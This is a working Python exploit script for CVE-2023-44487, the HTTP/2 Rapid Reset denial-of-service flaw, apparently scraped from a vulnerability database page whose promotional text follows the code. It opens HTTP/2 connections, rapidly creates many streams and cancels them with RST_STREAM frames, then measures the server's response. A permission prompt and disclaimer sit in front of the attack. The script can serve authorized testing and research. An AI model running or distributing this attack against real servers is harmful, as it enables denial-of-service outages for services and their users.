#!/usr/bin/env python3
"""
# Exploit Title: HTTP/2 2.0 - Denial Of Service (DOS)
# Google Dork: -NA-
# Date: 29th August 2025
# Exploit Author: Madhusudhan Rajappa
# Vendor Homepage: -NA-
# Software Link: -NA-
# Version: HTTP/2.0
# Tested on: -NA-
# CVE : CVE-2023-44487
"""
import asyncio
import ssl
import time
import argparse
import logging
from typing import Optional, Tuple
import statistics
try:
import h2.connection
import h2.events
import h2.exceptions
import h2.config
except ImportError:
print("Error: h2 library not installed. Install with: pip install h2")
exit(1)
# Configure logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)
class HTTP2RapidResetTester:
"""Class to test for CVE-2023-44487 HTTP/2 Rapid Reset vulnerability."""
def __init__(self, host: str, port: int = 443, use_ssl: bool = True):
self.host = host
self.port = port
self.use_ssl = use_ssl
self.connection = None
self.reader = None
self.writer = None
self.response_times = []
self.errors = []
self.connection_closed = False
async def connect(self) -> bool:
"""Establish HTTP/2 connection to the target server."""
try:
logger.info(f"Connecting to {self.host}:{self.port}")
if self.use_ssl:
ssl_context = ssl.create_default_context()
ssl_context.set_alpn_protocols(['h2'])
self.reader, self.writer = await asyncio.open_connection(
self.host, self.port, ssl=ssl_context
)
else:
self.reader, self.writer = await asyncio.open_connection(self.host, self.port)
# Initialize HTTP/2 connection
config = h2.config.H2Configuration(client_side=True)
self.connection = h2.connection.H2Connection(config=config)
self.connection.initiate_connection()
# Send connection preface
await self._send_data(self.connection.data_to_send())
logger.info("HTTP/2 connection established successfully")
self.connection_closed = False
return True
except Exception as e:
logger.error(f"Failed to establish connection: {e}")
return False
async def _send_data(self, data: bytes):
"""Send data to the server."""
if data and self.writer and not self.connection_closed:
try:
self.writer.write(data)
await self.writer.drain()
except (ConnectionResetError, BrokenPipeError, OSError) as e:
logger.debug(f"Connection error while sending data: {e}")
self.connection_closed = True
async def _receive_data(self) -> bytes:
"""Receive data from the server."""
try:
if self.connection_closed or not self.reader:
return b''
data = await asyncio.wait_for(self.reader.read(65535), timeout=5.0)
if not data:
self.connection_closed = True
return data
except asyncio.TimeoutError:
return b''
except (ConnectionResetError, BrokenPipeError, OSError) as e:
logger.debug(f"Connection error while receiving data: {e}")
self.connection_closed = True
return b''
async def rapid_reset_test(self, num_streams: int = 100, delay: float = 0.001) -> dict:
"""
Perform the rapid reset attack test.
Args:
num_streams: Number of streams to create and reset
delay: Delay between stream creations (seconds)
Returns:
Dictionary with test results
"""
logger.info(f"Starting rapid reset test with {num_streams} streams")
start_time = time.time()
created_streams = []
reset_streams = []
try:
# Phase 1: Rapidly create streams
for i in range(num_streams):
if self.connection_closed:
logger.warning("Connection closed during stream creation")
break
stream_id = (i * 2) + 1 # Odd numbers for client-initiated streams
# Create HTTP/2 headers
headers = [
(':method', 'GET'),
(':path', '/'),
(':scheme', 'https' if self.use_ssl else 'http'),
(':authority', self.host),
('user-agent', 'CVE-2023-44487-Tester/1.0'),
]
try:
# Send headers to create stream
self.connection.send_headers(stream_id, headers)
await self._send_data(self.connection.data_to_send())
created_streams.append(stream_id)
# Small delay to avoid overwhelming the connection
if delay > 0:
await asyncio.sleep(delay)
except Exception as e:
self.errors.append(f"Error creating stream {stream_id}: {e}")
if "connection" in str(e).lower():
break
logger.info(f"Created {len(created_streams)} streams")
# Phase 2: Rapidly reset all streams
reset_start = time.time()
for stream_id in created_streams:
if self.connection_closed:
logger.warning("Connection closed during stream reset")
break
try:
# Send RST_STREAM frame to cancel the request
self.connection.reset_stream(stream_id, error_code=0x8) # CANCEL error code
await self._send_data(self.connection.data_to_send())
reset_streams.append(stream_id)
if delay > 0:
await asyncio.sleep(delay / 10) # Faster resets
except h2.exceptions.StreamClosedError:
# Stream already closed, continue
pass
except Exception as e:
self.errors.append(f"Error resetting stream {stream_id}: {e}")
if "connection" in str(e).lower():
break
reset_duration = time.time() - reset_start
total_duration = time.time() - start_time
logger.info(f"Reset {len(reset_streams)} streams in {reset_duration:.3f}s")
# Phase 3: Monitor server response
await self._monitor_server_response(timeout=10.0)
return {
'streams_created': len(created_streams),
'streams_reset': len(reset_streams),
'total_duration': total_duration,
'reset_duration': reset_duration,
'reset_rate': len(reset_streams) / reset_duration if reset_duration > 0 else 0,
'errors': len(self.errors),
'response_times': self.response_times.copy(),
'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0,
'connection_closed': self.connection_closed
}
except Exception as e:
logger.error(f"Error during rapid reset test: {e}")
return {'error': str(e)}
async def _monitor_server_response(self, timeout: float = 10.0):
"""Monitor server responses and measure response times."""
logger.info("Monitoring server responses...")
end_time = time.time() + timeout
while time.time() < end_time and not self.connection_closed:
try:
start = time.time()
data = await self._receive_data()
response_time = time.time() - start
if data:
self.response_times.append(response_time)
try:
# Process HTTP/2 events
events = self.connection.receive_data(data)
for event in events:
if isinstance(event, h2.events.ResponseReceived):
logger.debug(f"Response received on stream {event.stream_id}")
elif isinstance(event, h2.events.StreamReset):
logger.debug(f"Stream {event.stream_id} reset by server")
elif isinstance(event, h2.events.ConnectionTerminated):
logger.warning("Server terminated connection")
self.connection_closed = True
return
except Exception as e:
logger.debug(f"Error processing HTTP/2 events: {e}")
await asyncio.sleep(0.1)
except Exception as e:
self.errors.append(f"Error monitoring response: {e}")
break
async def baseline_test(self, num_requests: int = 10) -> dict:
"""Perform baseline test with normal HTTP/2 requests."""
logger.info(f"Performing baseline test with {num_requests} normal requests")
start_time = time.time()
successful_requests = 0
for i in range(num_requests):
if self.connection_closed:
logger.warning("Connection closed during baseline test")
break
stream_id = (i * 2) + 1
headers = [
(':method', 'GET'),
(':path', '/'),
(':scheme', 'https' if self.use_ssl else 'http'),
(':authority', self.host),
('user-agent', 'CVE-2023-44487-Baseline/1.0'),
]
try:
request_start = time.time()
self.connection.send_headers(stream_id, headers)
self.connection.end_stream(stream_id)
await self._send_data(self.connection.data_to_send())
# Wait for response
try:
data = await asyncio.wait_for(self._receive_data(), timeout=5.0)
if data:
self.response_times.append(time.time() - request_start)
successful_requests += 1
except asyncio.TimeoutError:
logger.warning(f"Timeout waiting for response to request {i+1}")
await asyncio.sleep(0.1) # Small delay between requests
except Exception as e:
logger.warning(f"Error in baseline request {i+1}: {e}")
if "connection" in str(e).lower():
break
total_duration = time.time() - start_time
return {
'total_requests': num_requests,
'successful_requests': successful_requests,
'total_duration': total_duration,
'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0,
'success_rate': successful_requests / num_requests if num_requests > 0 else 0
}
async def close(self):
"""Close the connection gracefully."""
if self.writer and not self.connection_closed:
try:
# Try to close the connection gracefully
if self.connection:
try:
# Send GOAWAY frame if possible
self.connection.close_connection()
await self._send_data(self.connection.data_to_send())
except Exception as e:
logger.debug(f"Error sending GOAWAY frame: {e}")
# Close the writer
self.writer.close()
# Wait for close with timeout to avoid hanging
try:
await asyncio.wait_for(self.writer.wait_closed(), timeout=2.0)
except asyncio.TimeoutError:
logger.debug("Timeout waiting for connection to close")
except (ConnectionResetError, BrokenPipeError, OSError):
# Connection already closed by peer, this is expected
pass
except Exception as e:
logger.debug(f"Error during connection cleanup: {e}")
finally:
self.connection_closed = True
async def main():
parser = argparse.ArgumentParser(
description='CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester',
epilog='WARNING: Only use on systems you own or have permission to test!'
)
parser.add_argument('host', help='Target hostname')
parser.add_argument('-p', '--port', type=int, default=443, help='Target port (default: 443)')
parser.add_argument('--no-ssl', action='store_true', help='Disable SSL/TLS')
parser.add_argument('-s', '--streams', type=int, default=100,
help='Number of streams for rapid reset test (default: 100)')
parser.add_argument('-d', '--delay', type=float, default=0.001,
help='Delay between stream operations (default: 0.001s)')
parser.add_argument('--baseline-only', action='store_true',
help='Only perform baseline test')
parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')
args = parser.parse_args()
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
print("=" * 60)
print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester")
print("=" * 60)
print(f"Target: {args.host}:{args.port}")
print(f"SSL: {'Enabled' if not args.no_ssl else 'Disabled'}")
print()
# Legal disclaimer
print("LEGAL DISCLAIMER:")
print("This tool is for authorized security testing only.")
print("Ensure you have permission to test the target system.")
print("Unauthorized use may be illegal.")
print()
response = input("Do you have permission to test this system? (yes/no): ")
if response.lower() != 'yes':
print("Exiting. Only use this tool on systems you're authorized to test.")
return
tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl)
try:
# Connect to target
if not await tester.connect():
logger.error("Failed to establish connection. Exiting.")
return
# Perform baseline test
print("\n" + "="*40)
print("BASELINE TEST")
print("="*40)
baseline_results = await tester.baseline_test()
print(f"Baseline Results:")
print(f" Total Requests: {baseline_results['total_requests']}")
print(f" Successful: {baseline_results['successful_requests']}")
print(f" Success Rate: {baseline_results['success_rate']:.2%}")
print(f" Avg Response Time: {baseline_results['avg_response_time']:.3f}s")
print(f" Total Duration: {baseline_results['total_duration']:.3f}s")
if not args.baseline_only:
# Reset connection for rapid reset test
await tester.close()
tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl)
if not await tester.connect():
logger.error("Failed to re-establish connection for rapid reset test.")
return
# Perform rapid reset test
print("\n" + "="*40)
print("RAPID RESET TEST (CVE-2023-44487)")
print("="*40)
print(f"Testing with {args.streams} streams...")
rapid_results = await tester.rapid_reset_test(args.streams, args.delay)
if 'error' in rapid_results:
print(f"Test failed: {rapid_results['error']}")
else:
print(f"Rapid Reset Results:")
print(f" Streams Created: {rapid_results['streams_created']}")
print(f" Streams Reset: {rapid_results['streams_reset']}")
print(f" Reset Rate: {rapid_results['reset_rate']:.1f} resets/second")
print(f" Total Duration: {rapid_results['total_duration']:.3f}s")
print(f" Reset Duration: {rapid_results['reset_duration']:.3f}s")
print(f" Errors: {rapid_results['errors']}")
print(f" Avg Response Time: {rapid_results['avg_response_time']:.3f}s")
if rapid_results.get('connection_closed'):
print(f" Connection Status: Server closed connection during test")
# Analysis
print("\n" + "="*40)
print("VULNERABILITY ANALYSIS")
print("="*40)
if rapid_results.get('connection_closed'):
print("Server closed connection during rapid reset test")
print(" This could indicate protective measures or resource exhaustion.")
if rapid_results['streams_reset'] < rapid_results['streams_created'] * 0.8:
print("WARNING: Server may have rejected many reset requests")
print(" This could indicate protective measures are in place.")
if rapid_results['reset_rate'] > 1000:
print("HIGH RISK: Server accepts very high reset rates")
print(" This may indicate vulnerability to CVE-2023-44487")
elif rapid_results['reset_rate'] > 100:
print("MEDIUM RISK: Server accepts moderate reset rates")
print(" Further testing may be needed")
else:
print("LOWER RISK: Server has rate limiting on resets")
print(" This suggests some protection against the vulnerability")
if len(tester.errors) > rapid_results['streams_created'] * 0.1:
print("Many errors occurred during testing")
print(" Results may not be reliable")
except KeyboardInterrupt:
print("\nTest interrupted by user")
except Exception as e:
logger.error(f"Unexpected error: {e}")
finally:
try:
await tester.close()
except Exception as e:
logger.debug(f"Error during final cleanup: {e}")
print("\nTest completed.")
if __name__ == "__main__":
print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester")
print("Requires: pip install h2")
print()
try:
asyncio.run(main())
except KeyboardInterrupt:
print("\nExiting...")
except Exception as e:
logger.error(f"Fatal error: {e}")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation